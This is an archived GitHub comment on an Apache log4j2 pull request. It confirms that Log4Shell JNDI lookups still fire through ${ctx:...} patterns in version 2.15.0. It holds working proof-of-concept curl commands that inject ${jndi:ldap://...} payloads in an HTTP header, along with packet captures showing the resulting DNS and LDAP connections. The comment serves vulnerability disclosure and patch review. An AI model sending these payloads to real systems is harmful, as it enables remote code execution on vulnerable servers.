You are viewing a plain text version of this content. The canonical link for it is here.
Posted to notifications@logging.apache.org by GitBox <gi...@apache.org> on 2021/12/14 12:00:17 UTC
[GitHub] [logging-log4j2] SpComb commented on pull request #608: Restrict LDAP access via JNDI
SpComb commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993469509
> Following up on my question if this fixes usage with other property substitutions like ctx: [#608 (comment)](https://github.com/apache/logging-log4j2/pull/608#issuecomment-992427010)
>
> Apparently I could confirm my assumption regarding the usage of Thread Context Map, I created a PR here ([lunasec-io/lunasec#298](https://github.com/lunasec-io/lunasec/pull/298)) and made changes to the demonstration app to demonstrate the vulnerability even with `formatMsgNoLookups=true` set shown here: https://github.com/kmindi/log4shell-vulnerable-app.
>
> Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
>
> Can someone confirm this?
Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not:
```
41 17.676741911 172.17.0.1 -> 172.17.0.2 HTTP 209 GET / HTTP/1.1
42 17.676769664 172.17.0.2 -> 172.17.0.1 TCP 66 8080 > 56934 [ACK] Seq=1 Ack=144 Win=30080 Len=0 TSval=346936700 TSecr=2382643118
43 17.680613689 172.17.0.2 -> 10.52.0.2 DNS 79 Standard query 0xffa9 A example.net
44 17.680814368 10.52.0.2 -> 172.17.0.2 DNS 79 Standard query response 0xffa9 No such name
45 17.687397342 172.17.0.2 -> 172.17.0.1 HTTP 193 HTTP/1.1 200 (text/plain)
```
The bad news: this seems to also work with 2.15.0, `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:
```
$ docker exec -it log4shell-vulnerable-app jar -tvf /app/spring-boot-application.jar | grep log4j
828 Tue Dec 14 11:55:34 GMT 2021 BOOT-INF/classes/log4j2.properties
24231 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-slf4j-impl-2.15.0.jar
1789769 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-core-2.15.0.jar
30947 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-jul-2.15.0.jar
301804 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-api-2.15.0.jar
```
```
$ curl -v "$(docker inspect -f '{{.NetworkSettings.IPAddress}}' log4shell-vulnerable-app):8080/" -H 'X-Api-Version: ${jndi:ldap://localhost/test}'
* Trying 172.17.0.2:8080...
* Connected to 172.17.0.2 (172.17.0.2) port 8080 (#0)
> GET / HTTP/1.1
> Host: 172.17.0.2:8080
> User-Agent: curl/7.76.1
> Accept: */*
> X-Api-Version: ${jndi:ldap://localhost/test}
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 13
< Date: Tue, 14 Dec 2021 11:57:10 GMT
<
* Connection #0 to host 172.17.0.2 left intact
Hello, world![
```
```
$ sudo nsenter -t "$(docker inspect -f '{{.State.Pid}}' log4shell-vulnerable-app)" -n tshark -i lo -n
Running as user "root" and group "root". This could be dangerous.
Capturing on 'Loopback'
1 0.000000000 127.0.0.1 -> 127.0.0.1 TCP 74 38380 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426441 TSecr=0 WS=128
2 0.000013194 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38380 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
3 0.023625945 127.0.0.1 -> 127.0.0.1 TCP 74 38382 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426464 TSecr=0 WS=128
4 0.023636425 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38382 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
5 0.027652034 127.0.0.1 -> 127.0.0.1 TCP 74 38384 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426468 TSecr=0 WS=128
6 0.027662963 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38384 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
7 0.042974136 127.0.0.1 -> 127.0.0.1 TCP 74 38386 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426484 TSecr=0 WS=128
8 0.042985398 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38386 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
```
This requires a pattern configured to use `${ctx:...}` lookups with attacker-controlled `ThreadContext` values, which seem to get expanded recursively.
The JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by default" does not seem to apply to `${ctx:...}` lookups.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: notifications-unsubscribe@logging.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org